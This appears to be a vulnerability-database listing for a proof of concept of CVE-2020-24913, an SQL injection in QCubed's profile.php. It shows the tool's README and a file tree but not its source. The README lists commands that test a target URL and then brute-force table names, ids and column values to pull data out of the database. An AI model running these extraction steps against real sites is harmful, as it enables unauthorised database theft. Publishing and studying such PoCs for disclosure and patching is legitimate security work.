CVE-2020-24913 PoC — Matthias Van Woensel qcubed SQL注入漏洞

Source

Associated Vulnerability

Description

automated SQL injection for QCubed profile.php file

Readme

# qcubed-exploit

You need Bun to be installed: https://bun.sh


To install dependencies:

```bash
bun install
```

To run:

```bash
# show help
bun run exploit -h

# test for vulnerability
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php

# create a session for a new target
bun run exploit create -n your_session_name -u https://site.com/framework/assets/_core/php/profile.php

# brute table
bun run exploit brute-table -n your_session_name -w path/to/wordlist.txt

# show founded tables or column of a table
bun run exploit show-table -n your_session_name
bun run exploit show-column -n your_session_name -t table_name

# brute id
bun run exploit brute-id -n your_session_name -t table_name -i 1

# brute row value
# optionally add -r for resuming the brute forcing from where it stopped
bun run exploit brute-column -n your_session_name -t table_name -c column_name -i 1

# show founded key-value pairs of a table
# optionally `-i id_value` for showing only for a particular id 
bun run exploit show-rows -n your_session_name -t table_name

```

File Snapshot

 [4.0K]  /data/pocs/848f61f278c0d71dd292284bad9e8943c20f8c0d
├── [1.9K]  args.ts
├── [ 20K]  bun.lockb
├── [2.5K]  index.ts
├── [ 478]  package.json
├── [ 835]  profileLoader.ts
├── [1.1K]  README.md
├── [4.0K]  scripts
│   ├── [ 775]  common.ts
│   ├── [ 239]  git.ts
│   ├── [1021]  plugin.ts
│   ├── [4.0K]  profile
│   └── [ 20K]  profile.ts
└── [ 482]  tsconfig.json

2 directories, 11 files

Remarks